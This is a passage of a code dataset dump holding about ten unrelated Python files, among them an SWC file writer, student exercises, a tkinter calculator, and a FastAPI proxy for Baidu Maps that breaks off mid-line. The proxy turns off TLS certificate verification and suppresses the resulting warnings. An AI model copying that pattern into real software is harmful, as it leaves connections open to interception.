os\n\n\ndef is_path_valid(file_path):\n tmp_path, tmp_file = os.path.split(file_path)\n\n if not os.path.exists(file_path):\n if not os.path.exists(tmp_path):\n os.makedirs(tmp_path)\n new_file = open(file_path, \"w\")\n new_file.close()\n\n # if os.path.isdir(file_path):\n # raise PyNevalError(\"[Error: ] file: \\\"{}\\\" has exist in path: \\\"{}\\\". and it is a menu\"\n # .format(tmp_file, tmp_path))\n # return False\n\n return not os.path.isdir(file_path)\n\n\ndef save_line_tuple_as_swc(match_fail, file_path):\n with open(file_path, \"w\") as f:\n f.truncate()\n f.write(\"# total unmatched edges: {}\\n\".format(len(match_fail)))\n for line_tuple in match_fail:\n f.write(line_tuple[0].to_swc_str())\n f.write(\"# --End--\\n\")\n\n\ndef save_as_swc(object, file_path):\n if not is_path_valid(file_path):\n return False\n\n if isinstance(object, set):\n save_line_tuple_as_swc(object, file_path)\n\n\ndef print_line_tuple_swc(match_fail_set):\n for line_tuple in match_fail_set:\n print (\"pos_1: {}, pos_2 {}\".format(line_tuple[0]._pos, line_tuple[1]._pos))\n\n\ndef print_swc(object):\n if isinstance(object, set):\n print_line_tuple_swc(object)\n\n\ndef swc_save(swc_tree, out_path, extra=None):\n out_path = os.path.normpath(out_path)\n out_dir = os.path.dirname(out_path)\n\n while not os.path.exists(out_dir):\n print('[Info]: \"{}\" dose not exist. Create new path?[y/n]'.format(out_dir))\n choice = input()\n if choice.lower() == 'y':\n os.makedirs(out_dir)\n elif choice.lower() == 'n':\n print('[Info]: \"{}\" dose not exist. Input new directory?[y/n]'.format(out_dir))\n choice = input()\n if choice.lower() == 'y':\n print('[Info]: Input new directory')\n out_dir = input()\n elif choice.lower() == 'n':\n return False\n else:\n continue\n out_new_path = os.path.join(out_dir, os.path.basename(out_path))\n while not out_new_path[-4:] == '.swc':\n print('[Info]: \"{}\" is not a swc file. Input another path?[y/n]'.format(out_new_path))\n choice = input()\n if choice.lower() == 'y':\n print('[Info]: Input new path:')\n out_new_path = input()\n elif choice.lower() == 'n':\n return False\n\n while os.path.exists(out_new_path):\n print('[Info]: \"{}\" is already existed. Overwrite?[y/n]'.format(out_new_path))\n choice = input()\n if choice.lower() == 'y':\n break\n elif choice.lower() == 'n':\n return False\n\n swc_node_list = swc_tree.get_node_list()\n swc_tree.sort_node_list(key=\"id\")\n with open(out_new_path, \"w\") as f:\n f.truncate()\n if extra is not None:\n f.write(extra)\n for node in swc_node_list:\n if node.is_virtual():\n continue\n try:\n f.write(\n \"{} {} {} {} {} {} {}\\n\".format(\n node.get_id(),\n node._type,\n node.get_x(),\n node.get_y(),\n node.get_z(),\n node.radius(),\n node.parent.get_id(),\n )\n )\n except:\n continue\n return True","repo_name":"SupermeLC/PyNeval","sub_path":"pyneval/io/swc_writer.py","file_name":"swc_writer.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"17311606492","text":"#Deixando o programa amigavel:\r\nprint('=' * 50)\r\nprint('{:^50}'.format('Banco 24hrs'))\r\nprint('='*50)\r\nvalor = int(input('Quanto você deseja sacar? R$ '))\r\nprint('')\r\n#Nomeando variaveis:\r\ntotal = valor\r\nced = 100\r\ntotced = 0\r\n#Tive que aprender esse código novo, pois eu não estava conseguindo fazer de outra forma que foi explicada na aula:\r\nwhile True:\r\n#Ele vai passar por esse If se o Valor Total for maior ou igual ao da cédula e adicionar mais 1 ao contador na cedula:\r\n\tif total >= ced:\r\n\t\ttotal = total - ced\r\n\t\ttotced = totced + 1\r\n#Quando ele esgotar as possibilidades com uma das cedulas ele vai printar quantas cedulas ele conseguiu tirar do total e qual era o valor da cedula:\r\n\telse:\r\n\t\tif totced > 0:\r\n\t\t\tprint('Você recebera {} cédula(as) de R$ {}'.format(totced,ced))\r\n#Depois ele vai trocar os valores da cedula até conseguir zerar o valor total informado no inicio do programa:\r\n\t\tif ced == 100:\r\n\t\t\tced = 50\r\n\t\telif ced == 50:\r\n\t\t\tced = 20\r\n\t\telif ced == 20:\r\n\t\t\tced = 10\r\n\t\telif ced == 10:\r\n\t\t\tced = 5\r\n\t\telif ced == 5:\r\n\t\t\tced = 1\r\n#É muito importante zerar as cedulas no final, pois se não o programa vai misturar a quantidade de todas as cedulas:\r\n\t\ttotced = 0\r\n#Quando ele conseguir zerar o valor total ele vai parar o looping:\r\n\t\tif total == 0:\r\n\t\t\tbreak\r\n#Abaixo é somente uma linha para deixar o programa mais amigavel:\r\nprint('\\nObrigado por usar nosso Banco 24hrs!\\n')\r\nprint('=' * 50)\r\nprint('{:^50}'.format('Volte Sempre!'))\r\nprint('='*50)","repo_name":"tiduswr/Algoritimos_P1_UEPB_CCEA_CAMPUS_VII","sub_path":"Lista 02/lista02ex13.py","file_name":"lista02ex13.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71246691685","text":"# -*- coding: utf-8 -*-\n\nfrom googletrans import Translator\nimport xml.etree.ElementTree as ET\nimport time\nimport xlwt\n\n#languages = [\"nl\", \"ru\", \"en\", \"es\", \"tr\"]\nlanguages = [\"tr\"]\n\nclusters = {\"RESTAURANT#GENERAL\", 'RESTAURANT#PRICES', 'RESTAURANT#MISCELLANEOUS', 'FOOD#PRICES', 'FOOD#QUALITY', 'FOOD#STYLE_OPTIONS', 'DRINKS#PRICES', 'DRINKS#QUALITY', 'DRINKS#STYLE_OPTIONS', 'SERVICE#GENERAL', 'AMBIENCE#GENERAL', 'LOCATION#GENERAL'}\n\ntranslator = Translator()\n\nlista_aspectos = []\n\narquivo = \"aspectos_\"+languages[0]+\".xls\"\nprint(arquivo)\n#Leitura dos Arquivos\nfor lang in languages:\n tree = ET.parse(lang+\".xml\")\n root = tree.getroot()\n for sentence in root.iter('sentence'):\n #texto = sentence.find('text').text.lower()\n for opinions in sentence.findall('Opinions'):\n for opinion in opinions.findall('Opinion'):\n target = opinion.attrib['target']\n #print(type(target))\n #print(target)\n #print(target, type(target))\n if target != 'NULL' and target != '':\n target = target.lower()\n #print(target, type(target))\n if lang != 'en':\n traducao = translator.translate(target, src=lang, dest='en').text\n time.sleep( 0.25 )\n else:\n traducao = target\n categoria = opinion.attrib['category']\n #print(type(target))\n repeticao = False\n for aspectos in lista_aspectos:\n if aspectos[0] == target and aspectos[2] == categoria:\n aspectos[4] = aspectos[4] + 1\n print(target.decode('cp1251'), \" REPETIDO \", aspectos[4], \" vezes\")\n repeticao = True\n if not repeticao:\n try:\n print(type(target), type(traducao))\n target = str(target.encode('utf8'))\n traducao = str(traducao.encode('utf8'))\n lista = [target, traducao, categoria, lang, 1]\n print(str(target.encode('utf8')), lista)\n print(type(target), type(traducao))\n except UnicodeEncodeError:\n print(\"/t/t/tERRO: \", target ,traducao, categoria, lang, 1)\n lista_aspectos.append(lista)\nprint(lista_aspectos)\n\n#Gravação dos dados em planilhas\nwb = xlwt.Workbook(encoding=\"UTF-8\")\n\nfor categoria in clusters:\n ws = wb.add_sheet(categoria)\n # Títulos das colunas\n titles = [\"Aspecto\",\"Tradução\", \"Idioma\", \"TF\"]\n # Escrevendo títulos na primeira linha do arquivo\n for i in range(len(titles)):\n ws.write(0, i, titles[i])\n\n i = 1\n for aspecto in lista_aspectos:\n if aspecto[2] == categoria:\n # Escrevendo o identificar na 1ª coluna da linha i\n ws.write(i, 0, aspecto[0])\n ws.write(i, 1, aspecto[1])\n ws.write(i, 2, aspecto[3])\n ws.write(i, 3, aspecto[4])\n ws.write(i, 4, aspecto[2])\n i += 1\n \n# Salvando\nwb.save(arquivo)\n\n","repo_name":"lucasrafaelc/Mapeamento-Aspectos-Multil-ngues","sub_path":"Arquivos de Aspectos/lista_aspectos.py","file_name":"lista_aspectos.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10154377381","text":"number, height = map(int, input().split())\nmin_heights = [int(i) for i in input().split()]\n\ncount = 0\nfor min_height in min_heights:\n if height >= min_height:\n count += 1\n\nprint(count)\n\n\nimport time\ndef funcion_con_timeout():\n start_time = time.time()\n stack_tiring = []\n\n d, c, r = map(int, input().split())\n\n for i in range(c):\n stack_tiring.append(int(input()))\n\n for i in range(r):\n d += int(input())\n\n count = r\n for val in stack_tiring:\n if(d >= val):\n count+=1\n d -= val\n else:\n break\n print(count)\n end_time = time.time()\n elapsed_time = end_time - start_time\n return elapsed_time\n \ntiempo_transcurrido = funcion_con_timeout()\nprint(f\"El pcoeso tomo {tiempo_transcurrido} segundos\")\n","repo_name":"Rafterminador/ICPC-2023","sub_path":"problem-A.py","file_name":"problem-A.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13366051770","text":"from __future__ import absolute_import\r\nimport sys\r\nimport locale\r\nimport i18n_core\r\nimport babel\r\n\r\nfrom wx_utils import forms as wx_forms\r\nfrom gui_builder import fields\r\nimport app_elements\r\napplication = app_elements.find_application_module()\r\n\r\nclass LanguageSelectionPanel(wx_forms.AutoSizedPanel):\r\n\tlanguage = fields.ComboBox(label=__(\"Application &Language (requires restart)\"), read_only=True)\r\n\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper(LanguageSelectionPanel, self).__init__(*args, **kwargs)\r\n\t\tlocales = list(i18n_core.get_available_locales(application.name))\r\n\t\tif sys.version_info[0] < 3:\r\n\t\t\tself.locales = sorted(locales, key=lambda i: i.language, cmp=locale.strcoll)\r\n\t\tself.locales = sorted(locales, key=lambda i: locale.strxfrm(i.language))\r\n\r\n\tdef render(self, *args, **kwargs):\r\n\t\tsuper(LanguageSelectionPanel, self).render(*args, **kwargs)\r\n\t\tlocales = [u\"{name} ({english_name})\".format(name=i.language_name, english_name=i.english_name) for i in self.locales]\r\n\t\tself.language.set_value(locales)\r\n\t\tcurrent_locale = application.locale.split('.')[0]\r\n\t\tlanguages = [i.language for i in self.locales]\r\n\t\ttry:\r\n\t\t\tindex = languages.index(current_locale.split('_')[0])\r\n\t\texcept ValueError:\r\n\t\t\tindex = languages.index(i18n_core.DEFAULT_LOCALE.split('_')[0])\r\n\t\tself.language.set_index(index)\r\n\r\n\tdef set_config_values(self):\r\n\t\tlocale = self.locales[self.language.get_index()]\r\n\t\tif 'UI' not in application.config:\r\n\t\t\tapplication.config['UI'] = {}\r\n\t\tlocale_id = locale.language\r\n\t\tif locale.territory:\r\n\t\t\tlocale_id += \"_%s\" % locale.territory\r\n\t\tapplication.config['UI']['language'] = locale_id\r\n","repo_name":"accessibleapps/app_elements","sub_path":"app_elements/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8703227197","text":"def count_islands(grid):\n \"\"\"\n Input: 2D matrix, each item is [x, y] -> row, col.\n Output: number of islands, or 0 if found none.\n Notes: island is denoted by 1, ocean by 0 islands is counted by continuously\n connected vertically or horizontally by '1's.\n It's also preferred to check/mark the visited islands:\n - eg. using the helper function - mark_islands().\n \"\"\"\n islands = 0 # var. for the counts\n for r, row in enumerate(grid):\n for c, val in enumerate(row):\n if grid[r][c] == 1:\n islands += 1\n mark_islands(r,c,grid)\n print(r, c, islands)\n return islands\n\n\ndef mark_islands(i, j, grid):\n \"\"\"\n Input: the row, column and grid\n Output: None. Just mark the visited islands as in-place operation.\n \"\"\"\n if (i>=0) and (j>=0) and (i<=len(grid)-1) and (j<=len(grid[i])-1):\n print(f'inside mark_islands row:{i} column:{j} value:{grid[i][j]}')\n if grid[i][j] == 1:\n grid[i][j] = '#' # one way to mark visited ones - suggestion.\n mark_islands(i-1, j, grid)\n mark_islands(i+1, j, grid)\n mark_islands(i, j-1, grid)\n mark_islands(i, j+1, grid)\n\n\nsquares = [[1, 1, 0, 1],\n [1, 1, 0, 1],\n [0, 0, 1, 1],\n [1, 1, 1, 0]]\n\n\nprint(count_islands(squares))\n","repo_name":"syurskyi/Python_Topics","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/topics/Algorithms/263/islands.py","file_name":"islands.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28636213366","text":"#!/usr/local/bin/python3\n\nimport random\n\n\ndef random_string(length):\n return \"\".join(random.choice('ACTG') for _ in range(length))\n\n\nfile_name = \"random_strings.txt\"\nfile = open(file_name, \"w\")\n\nn = 100\n\nlength = 540\ntarget_start = 161\ntarget_length = 160\ntarget_end = target_start + target_length\nend = \"\\n\"\nseparator = \" \"\n\nprimer_1 = \"GTCCTTTGATTCTCCTGTCC\"\nprimer_2 = \"GCTCCCTACCACCATTTACT\"\n# primer_1 = random_string(20)\n# primer_2 = random_string(20)\n\nfor i in range(n):\n oligo = random_string(target_length)\n seq_start = random_string(target_start - 1 - 20)\n seq_end = random_string(length - 20 - target_start - target_length)\n sequence = seq_start + separator + primer_1 + separator + oligo + separator + primer_2 + separator + seq_end\n print(sequence)\n","repo_name":"miskiewiczm/primers_2","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"621181385","text":"import tkinter\nfrom tkinter import *\nfrom tkinter import messagebox\n\nv=\"\"\na=0\no=\"\"\ndef one():\n global v\n v+=\"1\"\n data.set(v)\ndef two():\n global v\n v+=\"2\"\n data.set(v)\ndef three():\n global v\n v+=\"3\"\n data.set(v)\ndef four():\n global v\n v+=\"4\"\n data.set(v)\ndef five():\n global v\n v+=\"5\"\n data.set(v)\ndef six():\n global v\n v+=\"6\"\n data.set(v)\ndef seven():\n global v\n v+=\"7\"\n data.set(v)\ndef eight():\n global v\n v+=\"8\"\n data.set(v)\ndef nine():\n global v\n v+=\"9\"\n data.set(v)\ndef zero():\n global v\n v+=\"0\"\n data.set(v)\n\ndef plus():\n global a\n global v\n global o\n a=int(v)\n o=\"+\"\n v+=\"+\"\n data.set(v) \ndef minus():\n global a\n global v\n global o\n a=int(v)\n o=\"-\"\n v+=\"-\"\n data.set(v)\ndef multiply():\n global a\n global v\n global o\n a=int(v)\n o=\"*\"\n v+=\"*\"\n data.set(v)\ndef divide():\n global a\n global v\n global o\n a=int(v)\n o=\"/\"\n v+=\"/\"\n data.set(v)\ndef c():\n global a\n global v\n global o\n v=\"\"\n a=0\n o=\"\"\n data.set(v)\ndef result():\n global a\n global v\n global o\n t=v\n if o==\"+\":\n b=int((t.split(\"+\")[1]))\n s=a+b\n data.set(s)\n v=str(s)\n elif o==\"-\":\n b=int((t.split(\"-\")[1]))\n s=a-b\n data.set(s)\n v=str(s)\n elif o==\"*\":\n b=int((t.split(\"*\")[1]))\n s=a*b\n data.set(s)\n v=str(s)\n elif o==\"/\":\n b=int((t.split(\"/\")[1]))\n if b==0:\n messagebox.showerror(\"Error\",\"Division by '0' not allowed\")\n a=\"\"\n v=\"\"\n data.set(v)\n else:\n s=int(a/b)\n data.set(s)\n v=str(s)\n\n\nroot=tkinter.Tk()\nroot.geometry('300x400+900+100')\nroot.wm_iconbitmap('cal.ico')\nroot.title('Calculator')\ndata=StringVar()\nl=Label(\n root,\n text='label',\n anchor=SE,\n font=('verdana',20),\n textvariable=data)\nl.pack(expand=True,fill='both')\nbr1=Frame(root,bg='#000000')\nbr1.pack(expand=True,fill='both')\nbr2=Frame(root)\nbr2.pack(expand=True,fill='both')\nbr3=Frame(root)\nbr3.pack(expand=True,fill='both')\nbr4=Frame(root)\nbr4.pack(expand=True,fill='both')\nb1=Button(\n br1,\n text=\"1\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=one)\nb1.pack(side=LEFT,expand=True,fill ='both')\nb2=Button(\n br1,\n text=\"2\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=two)\nb2.pack(side=LEFT,expand=True,fill ='both')\nb3=Button(\n br1,\n text=\"3\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=three)\nb3.pack(side=LEFT,expand=True,fill ='both')\nb4=Button(\n br1,\n text=\"+\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=plus)\nb4.pack(side=LEFT,expand=True,fill ='both')\n\n\nb5=Button(\n br2,\n text=\"4\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=four)\nb5.pack(side=LEFT,expand=True,fill ='both')\nb6=Button(\n br2,\n text=\"5\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=five)\nb6.pack(side=LEFT,expand=True,fill ='both')\nb7=Button(\n br2,\n text=\"6\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=six)\nb7.pack(side=LEFT,expand=True,fill ='both')\nb8=Button(\n br2,\n text=\"-\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=minus)\nb8.pack(side=LEFT,expand=True,fill ='both')\n\nb9=Button(\n br3,\n text=\"7\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=seven)\nb9.pack(side=LEFT,expand=True,fill ='both')\nb10=Button(\n br3,\n text=\"8\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=eight)\nb10.pack(side=LEFT,expand=True,fill ='both')\nb11=Button(\n br3,\n text=\"9\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=nine)\nb11.pack(side=LEFT,expand=True,fill ='both')\nb12=Button(\n br3,\n text=\"*\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=multiply)\nb12.pack(side=LEFT,expand=True,fill ='both')\n\n\nb13=Button(\n br4,\n text=\"C\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=c)\nb13.pack(side=LEFT,expand=True,fill ='both')\nb14=Button(\n br4,\n text=\"0\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=zero)\nb14.pack(side=LEFT,expand=True,fill ='both')\nb15=Button(\n br4,\n text=\"=\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=result)\nb15.pack(side=LEFT,expand=True,fill ='both')\nb16=Button(\n br4,\n text=\"/\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=divide)\nb16.pack(side=LEFT,expand=True,fill ='both')\n\n\nroot.mainloop()","repo_name":"Hardik200404/Calculator-GUI-Application","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38168107321","text":"master_dic = {\n 'shards': 0,\n 'fragments': 0,\n 'motes': 0\n}\nflag = False\n\nwhile True:\n temporary_dic = {}\n data = input().split()\n keys = [element for element in data if (data.index(element) + 1) % 2 == 0]\n values = [int(element) for element in data if (data.index(element) + 1) % 2 != 0]\n\n a = 0\n for key in keys:\n if key.lower() in temporary_dic.keys():\n temporary_dic[key.lower()] += values[a]\n else:\n temporary_dic[key.lower()] = values[a]\n a += 1\n\n for key, value in temporary_dic.items():\n if key.lower() in master_dic:\n master_dic[key.lower()] += value\n if master_dic['shards'] >= 250:\n master_dic['shards'] -= 250\n print('Shadowmourne obtained!')\n flag = True\n break\n elif master_dic['fragments'] >= 250:\n master_dic['fragments'] -= 250\n print('Valanyr obtained!')\n flag = True\n break\n elif master_dic['motes'] >= 250:\n master_dic['motes'] -= 250\n print('Dragonwrath obtained!')\n flag = True\n break\n else:\n master_dic[key.lower()] = value\n if flag:\n break\nfor key, value in master_dic.items():\n print(f'{key}: {value}')\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Python Fundamentals May 2023/Dictionaries Exercises/legendary_farming.py","file_name":"legendary_farming.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8476175236","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n@File : main.py\n@Time : 2023/09/16 00:21:58\n@Author : yxh \n@Version : 1.0\n@Contact : xianhe_yan@sina.com\n\"\"\"\n\nfrom fastapi.staticfiles import StaticFiles\nfrom loguru import logger\nimport hashlib\nimport os\nimport re\nimport requests\nimport urllib3\nimport logging\n\nfrom fastapi import FastAPI, Request, Request, Response\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom modules.db_client import MyredisClient\nfrom public.metadata import Tags\n\nfrom public.system import Configs\nfrom public.utils import UtilsTools\n\n\n\n# # ## ssl\nurllib3.disable_warnings()\nlogging.captureWarnings(True)\n\ndescription = \"\"\"\"\"\"\n\n# ####################################################################################################\n# ##*******************************************************************************************#######\n# ##************************* os env *****************************#######\n# ##*******************************************************************************************#######\n# # ## 提供服务地址\nEXTERNAL_URL = os.environ.get(\"EXTERNAL_URL\", \"http://10.138.4.163:9095\")\n# # ## 提供服务地址\nHTTPS_TYPE = os.environ.get(\"HTTPS_TYPE\", \"https://\")\n# # ## http 百度源地址\nAPI_WEBGL = os.environ.get(\"API_WEBGL\")\n\n# # ## 百度 ak\nAPI_WEBGL_AK = os.environ.get(\"API_WEBGL_AK\", \"API_WEBGL_AK\")\n\n# ## 四级域名\n\n# ## 三级域名\nMAPOPEN_CDN_BCEBOS_COM = os.environ.get(\"MAPOPEN_CDN_BCEBOS_COM\", \"mapopen.cdn.bcebos.com\")\nAPI_MAP_BAIDU_COM = os.environ.get(\"API_MAP_BAIDU_COM\", \"api.map.baidu.com\")\n# ## 二级级域名\nHM_BAIDU_COM = os.environ.get(\"HM_BAIDU_COM\", \"hm.baidu.com\")\nMAPONLINE0_BDIMG_COM = os.environ.get(\"MAPONLINE0_BDIMG_COM\", \"maponline0.bdimg.com\")\nMAPONLINE1_BDIMG_COM = os.environ.get(\"MAPONLINE1_BDIMG_COM\", \"maponline1.bdimg.com\")\nMAPONLINE2_BDIMG_COM = os.environ.get(\"MAPONLINE2_BDIMG_COM\", \"maponline2.bdimg.com\")\nMAPONLINE3_BDIMG_COM = os.environ.get(\"MAPONLINE3_BDIMG_COM\", \"maponline3.bdimg.com\")\nWEBMAP0_BDIMG_COM = os.environ.get(\"WEBMAP0_BDIMG_COM\", \"webmap0.bdimg.com\")\nPCOR_BAIDU_COM = os.environ.get(\"PCOR_BAIDU_COM\", \"pcor.baidu.com\")\nMIAO_BAIDU_COM = os.environ.get(\"MIAO_BAIDU_COM\", \"miao.baidu.com\")\nDLSWBR_BAIDU_COM = os.environ.get(\"DLSWBR_BAIDU_COM\", \"dlswbr.baidu.com\")\nMAP_BAIDU_COM = os.environ.get(\"MAP_BAIDU_COM\", \"map.baidu.com\")\n# # ## http DMZ 区域代理\nif \"https\" in HTTPS_TYPE:\n # # ## https DMZ 区域代理\n NG_MAPOPEN_CDN_BCEBOS_COM = os.environ.get(\n \"NG_MAPOPEN_CDN_BCEBOS_COM\", \"10.138.4.198:11443/mapopen_cdn_bcebos_com\"\n )\n NG_HM_BAIDU_COM = os.environ.get(\n \"NG_HM_BAIDU_COM\", \"10.138.4.198:11443/hm_baidu_com\"\n )\n NG_API_MAP_BAIDU_COM = os.environ.get(\n \"NG_API_MAP_BAIDU_COM\", \"10.138.4.198:11443/api_map_baidu_com\"\n )\n NG_MAPONLINE0_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE0_BDIMG_COM\", \"10.138.4.198:11443/maponline0_bdimg_com\"\n )\n NG_MAPONLINE1_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE1_BDIMG_COM\", \"10.138.4.198:11443/maponline1_bdimg_com\"\n )\n NG_MAPONLINE2_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE2_BDIMG_COM\", \"10.138.4.198:11443/maponline2_bdimg_com\"\n )\n NG_MAPONLINE3_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE3_BDIMG_COM\", \"10.138.4.198:11443/maponline3_bdimg_com\"\n )\n NG_WEBMAP0_BDIMG_COM = os.environ.get(\n \"NG_WEBMAP0_BDIMG_COM\", \"10.138.4.198:11443/webmap0_bdimg_com\"\n )\n NG_PCOR_BAIDU_COM = os.environ.get(\n \"NG_PCOR_BAIDU_COM\", \"10.138.4.198:11443/pcor_baidu_com\"\n )\n NG_MIAO_BAIDU_COM = os.environ.get(\n \"NG_MIAO_BAIDU_COM\", \"10.138.4.198:11443/miao_baidu_com\"\n )\n NG_DLSWBR_BAIDU_COM = os.environ.get(\n \"NG_DLSWBR_BAIDU_COM\", \"10.138.4.198:11443/dlswbr_baidu_com\"\n )\n NG_MAP_BAIDU_COM = os.environ.get(\n \"NG_MAP_BAIDU_COM\", \"10.138.4.198:11443/map_baidu_com\"\n )\nelse:\n NG_MAPOPEN_CDN_BCEBOS_COM = os.environ.get(\n \"NG_MAPOPEN_CDN_BCEBOS_COM\", \"10.138.4.198:11080/mapopen_cdn_bcebos_com\"\n )\n NG_HM_BAIDU_COM = os.environ.get(\n \"NG_HM_BAIDU_COM\", \"10.138.4.198:11080/hm_baidu_com\"\n )\n NG_API_MAP_BAIDU_COM = os.environ.get(\n \"NG_API_MAP_BAIDU_COM\", \"10.138.4.198:11080/api_map_baidu_com\"\n )\n NG_MAPONLINE0_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE0_BDIMG_COM\", \"10.138.4.198:11080/maponline0_bdimg_com\"\n )\n NG_MAPONLINE1_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE1_BDIMG_COM\", \"10.138.4.198:11080/maponline1_bdimg_com\"\n )\n NG_MAPONLINE2_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE2_BDIMG_COM\", \"10.138.4.198:11080/maponline2_bdimg_com\"\n )\n NG_MAPONLINE3_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE3_BDIMG_COM\", \"10.138.4.198:11080/maponline3_bdimg_com\"\n )\n NG_WEBMAP0_BDIMG_COM = os.environ.get(\n \"NG_WEBMAP0_BDIMG_COM\", \"10.138.4.198:11080/webmap0_bdimg_com\"\n )\n NG_PCOR_BAIDU_COM = os.environ.get(\n \"NG_PCOR_BAIDU_COM\", \"10.138.4.198:11080/pcor_baidu_com\"\n )\n NG_MIAO_BAIDU_COM = os.environ.get(\n \"NG_MIAO_BAIDU_COM\", \"10.138.4.198:11080/miao_baidu_com\"\n )\n NG_DLSWBR_BAIDU_COM = os.environ.get(\n \"NG_DLSWBR_BAIDU_COM\", \"10.138.4.198:11080/dlswbr_baidu_com\"\n )\n NG_MAP_BAIDU_COM = os.environ.get(\n \"NG_MAP_BAIDU_COM\", \"10.138.4.198:11080/map_baidu_com\"\n )\n\nif API_WEBGL is not None:\n _webgl_ = API_WEBGL\nelse:\n _webgl_ = Configs._WEBGL_\n\n\n#####################################################################################################\n###*******************************************************************************************#######\n###************************* FastAPI init *****************************#######\n###*******************************************************************************************#######\ntry:\n tags_metadata = Tags.tags_metadata()\n app = FastAPI(\n title=\"jsapiAPI\",\n description=description,\n summary=\"\",\n openapi_url=\"/jsapiAPI.json\",\n version=\"v1.0.0\",\n openapi_tags=tags_metadata,\n )\n\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n # 将静态文件目录配置为 static 文件夹\n app.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n logger.success(\"[success] running (Press CTRL+C to quit) \")\nexcept Exception as e:\n logger.error(\"[error] running %s\" % e)\n raise e\n\n\n \n# ####################################################################################################\n# ##*******************************************************************************************#######\n# ##************************* JSAPI init *****************************#######\n# ##*******************************************************************************************#######\n\nasync def send_http(_uuid, _requrl, _headers, payload={}):\n try:\n response = requests.request(\n \"GET\", _requrl, headers=_headers, data=payload, verify=False, timeout=10\n )\n # 设置响应编码为 UTF-8\n # response.encoding = 'UTF-8'\n # 获取响应的估计编码方式\n encoding = response.apparent_encoding\n # 设置响应编码为估计编码方式\n response.encoding = encoding\n except requests.exceptions.Timeout:\n msg = \"Internal#Server#Error TimeoutException [%s] \" % _requrl\n logging.error((\"[%s] {%s}\" % (_uuid, msg)))\n return msg\n except requests.exceptions.ConnectionError as e:\n msg = \"Internal#Server#Error Exception [%s] \" % _requrl\n logging.error((\"[%s] {%s}\" % (_uuid, msg)))\n return \"Internal#Server#Error Exception %s\" % e\n except requests.exceptions.HTTPError as e:\n logging.error((\"[%s] {%s}\" % (_uuid, msg)))\n return \"Internal#Server#Error Exception 0 %s\" % e\n if response.status_code == 200:\n return response.text\n else :\n return \"Internal#Server#Error Exception 0 %s\" % response.status_code\n# 清理key\ndef clear_redis_key(ak):\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._JSAPI_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETSCRIPT_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETBMAPCSS_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETSCRIPT_NEW_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETBMAPCSS_NEW_KEY, ak))\n\nasync def function_url(ak, srt):\n # # ## 源 js url\n _webgl_js = \"\"\n # # ## 源 css url\n _webgl_css = \"\"\n _key_new = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n _functon_webgl_new = \"\"\n # 正则表达式匹配模式 查找符合模式的URL\n pattern = re.compile(r'https?://[^\\s\"\\']+')\n urls = re.findall(pattern, srt)\n for url in urls:\n if \"getscript\" in url.lower():\n if \".baidu.com\" in _webgl_.lower() :\n _webgl_js = 